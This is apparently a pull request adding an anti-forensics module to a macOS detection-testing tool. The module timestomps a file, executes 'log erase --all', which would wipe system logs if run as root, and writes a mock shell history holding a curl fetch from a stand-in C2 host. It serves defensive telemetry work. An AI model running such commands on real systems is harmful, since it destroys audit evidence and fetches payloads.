### PR TITLE
feat: add evade_log_clear for defense evasion telemetry

### DIFF
--- a/README.md
+++ b/README.md
@@ -50,6 +50,7 @@ make build
 | `service` | LaunchAgent/Daemon persistence, cron, shell profile, Login Items | svc_launch_agent, svc_launch_daemon, svc_cron, svc_shell_profile, svc_login_item |
 | `plist` | Plist creation and modification | plist_create, plist_modify |
 | `xpc` | XPC service enumeration | xpc_enumerate |
+| `evasion` | Defense evasion: log clearing, timestomping, history removal | evade_log_clear |
 
 ## Commands
 
@@ -124,6 +125,7 @@ Module documentation lives alongside each category:
 | `service` | [modules/service/README.md](modules/service/README.md) |
 | `plist` | [modules/plist/README.md](modules/plist/README.md) |
 | `xpc` | [modules/xpc/README.md](modules/xpc/README.md) |
+| `evasion` | [modules/evasion/README.md](modules/evasion/README.md) |
 
 ## Scenarios
 

--- a/internal/audit/classify.go
+++ b/internal/audit/classify.go
@@ -53,6 +53,12 @@ func Classify(category, eventType string) Classification {
 		return Classification{4002, "HTTP Activity", 4, "Network Activity", 6, "Post"}
 	case "dns_lookup", "dns_exfil_query":
 		return Classification{4003, "DNS Activity", 4, "Network Activity", 1, "Query"}
+	case "file_timestomp":
+		return Classification{1001, "File System Activity", 1, "System Activity", 6, "Set Attributes"}
+	case "log_erase_attempt":
+		return Classification{1007, "Process Activity", 1, "System Activity", 1, "Launch"}
+	case "history_clear":
+		return Classification{1001, "File System Activity", 1, "System Activity", 4, "Delete"}
 	}
 
 	switch category {

--- a/internal/audit/classify_test.go
+++ b/internal/audit/classify_test.go
@@ -91,6 +91,11 @@ func TestClassify(t *testing.T) {
 		{"endpoint_security", "es_notify_unmount", 1001, 13},
 		{"endpoint_security", "es_volume_exec", 1007, 1},
 
+		// evasion (routed by event type, not category)
+		{"evasion", "file_timestomp", 1001, 6},
+		{"evasion", "log_erase_attempt", 1007, 1},
+		{"evasion", "history_clear", 1001, 4},
+
 		// unmapped category/event falls back to API Activity/Other
 		{"unknown_category", "unknown_event", 6003, 99},
 	}

--- a/modules/evasion/README.md
+++ b/modules/evasion/README.md
@@ -1,0 +1,15 @@
+# evasion
+
+Defense evasion and anti-forensics: log clearing, timestamp manipulation, and history removal.
+
+## Modules
+
+### `evade_log_clear`
+Timestomps a staging file via `os.Chtimes`, attempts `log erase --all` (fails without root - the denied exec is the signal), and creates then removes a mock `.zsh_history`. Maps to T1070.006, T1070.002, T1070.003.
+
+All artifacts live in a staging directory (default `/tmp/macnoise_evasion`) and are removed on cleanup. The user's real shell history is never touched.
+
+```bash
+macnoise run evade_log_clear
+macnoise run evade_log_clear --param stage_dir=/var/tmp/macnoise_evasion
+```

--- a/modules/evasion/log_clear.go
+++ b/modules/evasion/log_clear.go
@@ -1,0 +1,189 @@
+package evasion
+
+import (
+	"context"
+	"fmt"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"time"
+
+	"github.com/0xv1n/macnoise/internal/output"
+	"github.com/0xv1n/macnoise/pkg/module"
+)
+
+const defaultEvasionStageDir = "/tmp/macnoise_evasion"
+
+type evadeLogClear struct {
+	stageDir string
+}
+
+func (e *evadeLogClear) Info() module.ModuleInfo {
+	return module.ModuleInfo{
+		Name:        "evade_log_clear",
+		Description: "Timestomps a file, attempts unified log erasure, and clears a mock history file to generate defense evasion telemetry",
+		Category:    module.CategoryEvasion,
+		Tags:        []string{"evasion", "anti-forensics", "timestomp", "log-clear", "history"},
+		Privileges:  module.PrivilegeNone,
+		MITRE: []module.MITRE{
+			{Technique: "T1070", SubTech: ".006", Name: "Indicator Removal: Timestomp"},
+			{Technique: "T1070", SubTech: ".002", Name: "Indicator Removal: Clear Linux or Mac System Logs"},
+			{Technique: "T1070", SubTech: ".003", Name: "Indicator Removal: Clear Command History"},
+		},
+		Author:   "0xv1n",
+		MinMacOS: "12.0",
+	}
+}
+
+func (e *evadeLogClear) ParamSpecs() []module.ParamSpec {
+	return []module.ParamSpec{
+		{
+			Name:         "stage_dir",
+			Description:  "Directory for staging evasion artifacts",
+			Required:     false,
+			DefaultValue: defaultEvasionStageDir,
+			Example:      "/var/tmp/macnoise_evasion",
+		},
+	}
+}
+
+func (e *evadeLogClear) CheckPrereqs() error { return nil }
+
+// timestomp creates a file and sets its mtime to a date in the past.
+// The os.Chtimes call generates the utimes syscall that an EDR fires on,
+// and is cross-platform testable unlike touch -t.
+func timestomp(info module.ModuleInfo, target string) module.TelemetryEvent {
+	if err := os.WriteFile(target, []byte("macnoise timestomp target\n"), 0o644); err != nil {
+		ev := output.NewEvent(info, "file_timestomp", false,
+			fmt.Sprintf("failed to create timestomp target: %s", target))
+		return output.WithError(ev, err)
+	}
+
+	past := time.Date(2000, 1, 1, 0, 0, 0, 0, time.UTC)
+	err := os.Chtimes(target, past, past)
+	if err != nil {
+		ev := output.NewEvent(info, "file_timestomp", true,
+			fmt.Sprintf("timestomp denied: %s", target))
+		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
+		return output.WithDetails(ev, map[string]any{
+			"path":         target,
+			"target_mtime": past.Format(time.RFC3339),
+			"technique":    "T1070.006",
+		})
+	}
+
+	ev := output.NewEvent(info, "file_timestomp", true,
+		fmt.Sprintf("timestomped %s to %s", target, past.Format("2006-01-02")))
+	return output.WithDetails(ev, map[string]any{
+		"path":         target,
+		"target_mtime": past.Format(time.RFC3339),
+		"technique":    "T1070.006",
+	})
+}
+
+// logErase attempts `log erase --all`. Without root this fails, and the
+// denied exec is exactly the telemetry a detection should fire on.
+func logErase(ctx context.Context, info module.ModuleInfo) module.TelemetryEvent {
+	out, err := exec.CommandContext(ctx, "log", "erase", "--all").CombinedOutput()
+	if err != nil {
+		ev := output.NewEvent(info, "log_erase_attempt", true,
+			"log erase --all denied (expected without root)")
+		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
+		return output.WithDetails(ev, map[string]any{
+			"command":   "log erase --all",
+			"output":    string(out),
+			"technique": "T1070.002",
+		})
+	}
+
+	ev := output.NewEvent(info, "log_erase_attempt", true,
+		"log erase --all succeeded")
+	return output.WithDetails(ev, map[string]any{
+		"command":   "log erase --all",
+		"output":    string(out),
+		"technique": "T1070.002",
+	})
+}
+
+// clearHistory creates a mock history file and removes it. The unlink
+// generates the file-deletion telemetry that history-clearing detections
+// key on, without touching the user's real shell history.
+func clearHistory(info module.ModuleInfo, stageDir string) module.TelemetryEvent {
+	histFile := filepath.Join(stageDir, ".zsh_history")
+	if err := os.WriteFile(histFile, []byte("echo secret-command\ncurl http://c2.evil.invalid/payload\n"), 0o600); err != nil {
+		ev := output.NewEvent(info, "history_clear", false,
+			fmt.Sprintf("failed to create mock history: %s", histFile))
+		return output.WithError(ev, err)
+	}
+
+	err := os.Remove(histFile)
+	if err != nil {
+		ev := output.NewEvent(info, "history_clear", true,
+			fmt.Sprintf("mock history removal denied: %s", histFile))
+		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
+		return output.WithDetails(ev, map[string]any{
+			"path":      histFile,
+			"technique": "T1070.003",
+		})
+	}
+
+	ev := output.NewEvent(info, "history_clear", true,
+		fmt.Sprintf("mock history cleared: %s", histFile))
+	return output.WithDetails(ev, map[string]any{
+		"path":      histFile,
+		"technique": "T1070.003",
+	})
+}
+
+func (e *evadeLogClear) Generate(ctx context.Context, params module.Params, emit module.EventEmitter) error {
+	info := e.Info()
+	stageDir := params.Get("stage_dir", defaultEvasionStageDir)
+	if err := os.MkdirAll(stageDir, 0o755); err != nil {
+		return fmt.Errorf("mkdir %s: %w", stageDir, err)
+	}
+	e.stageDir = stageDir
+
+	select {
+	case <-ctx.Done():
+		return ctx.Err()
+	default:
+	}
+	emit(timestomp(info, filepath.Join(stageDir, "timestomp_target")))
+
+	select {
+	case <-ctx.Done():
+		return ctx.Err()
+	default:
+	}
+	emit(logErase(ctx, info))
+
+	select {
+	case <-ctx.Done():
+		return ctx.Err()
+	default:
+	}
+	emit(clearHistory(info, stageDir))
+
+	return nil
+}
+
+func (e *evadeLogClear) DryRun(params module.Params) []string {
+	stageDir := params.Get("stage_dir", defaultEvasionStageDir)
+	return []string{
+		fmt.Sprintf("mkdir -p %s", stageDir),
+		fmt.Sprintf("touch -t 200001010000 %s/timestomp_target (T1070.006)", stageDir),
+		"log erase --all (T1070.002, requires root)",
+		fmt.Sprintf("create and remove %s/.zsh_history (T1070.003)", stageDir),
+	}
+}
+
+func (e *evadeLogClear) Cleanup() error {
+	if e.stageDir == "" {
+		return nil
+	}
+	return os.RemoveAll(e.stageDir)
+}
+
+func init() {
+	module.Register(&evadeLogClear{})
+}

--- a/modules/evasion/log_clear_test.go
+++ b/modules/evasion/log_clear_test.go
@@ -1,0 +1,96 @@
+package evasion
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+	"time"
+
+	"github.com/0xv1n/macnoise/pkg/module"
+)
+
+func TestTimestomp_ChangesMtime(t *testing.T) {
+	dir := t.TempDir()
+	target := filepath.Join(dir, "ts_target")
+	info := (&evadeLogClear{}).Info()
+
+	ev := timestomp(info, target)
+	if ev.EventType != "file_timestomp" {
+		t.Fatalf("event type = %q, want file_timestomp", ev.EventType)
+	}
+	if !ev.Success {
+		t.Fatalf("timestomp reported failure: %s", ev.Message)
+	}
+
+	stat, err := os.Stat(target)
+	if err != nil {
+		t.Fatalf("stat: %v", err)
+	}
+	want := time.Date(2000, 1, 1, 0, 0, 0, 0, time.UTC)
+	if !stat.ModTime().Equal(want) {
+		t.Errorf("mtime = %v, want %v", stat.ModTime(), want)
+	}
+}
+
+func TestTimestomp_BadPath(t *testing.T) {
+	info := (&evadeLogClear{}).Info()
+	ev := timestomp(info, filepath.Join(t.TempDir(), "no", "such", "dir", "file"))
+	if ev.Success {
+		t.Error("expected failure for nonexistent parent dir")
+	}
+}
+
+func TestClearHistory_RemovesFile(t *testing.T) {
+	dir := t.TempDir()
+	info := (&evadeLogClear{}).Info()
+
+	ev := clearHistory(info, dir)
+	if ev.EventType != "history_clear" {
+		t.Fatalf("event type = %q, want history_clear", ev.EventType)
+	}
+	if !ev.Success {
+		t.Fatalf("history clear reported failure: %s", ev.Message)
+	}
+
+	histFile := filepath.Join(dir, ".zsh_history")
+	if _, err := os.Stat(histFile); !os.IsNotExist(err) {
+		t.Error("mock history file still exists after clear")
+	}
+}
+
+func TestDryRunListsAllTechniques(t *testing.T) {
+	mod := &evadeLogClear{}
+	steps := mod.DryRun(module.Params{})
+	if len(steps) != 4 {
+		t.Fatalf("dry run listed %d steps, want 4", len(steps))
+	}
+}
+
+func TestCleanupRemovesStagingDir(t *testing.T) {
+	dir := t.TempDir()
+	stageDir := filepath.Join(dir, "evasion_stage")
+	if err := os.MkdirAll(stageDir, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(stageDir, "artifact"), []byte("x"), 0o644); err != nil {
+		t.Fatal(err)
+	}
+
+	mod := &evadeLogClear{stageDir: stageDir}
+	if err := mod.Cleanup(); err != nil {
+		t.Fatalf("cleanup: %v", err)
+	}
+	if _, err := os.Stat(stageDir); !os.IsNotExist(err) {
+		t.Error("staging dir still exists after cleanup")
+	}
+}
+
+func TestEvadeLogClearInfo(t *testing.T) {
+	info := (&evadeLogClear{}).Info()
+	if info.Name != "evade_log_clear" {
+		t.Errorf("name = %q, want evade_log_clear", info.Name)
+	}
+	if len(info.MITRE) != 3 {
+		t.Errorf("expected 3 MITRE entries, got %d", len(info.MITRE))
+	}
+}

--- a/pkg/module/category.go
+++ b/pkg/module/category.go
@@ -13,6 +13,7 @@ const (
 	CategoryService          Category = "service"
 	CategoryPlist            Category = "plist"
 	CategoryXPC              Category = "xpc"
+	CategoryEvasion          Category = "evasion"
 )
 
 // AllCategories returns a slice containing every known Category value.
@@ -26,5 +27,6 @@ func AllCategories() []Category {
 		CategoryService,
 		CategoryPlist,
 		CategoryXPC,
+		CategoryEvasion,
 	}
 }


### PR DESCRIPTION
Introduces the evasion category with evade_log_clear, covering timestomping (T1070.006), unified log erasure (T1070.002), and command history clearing (T1070.003). All artifacts live in a staging dir and are cleaned up; the user's real history is never touched.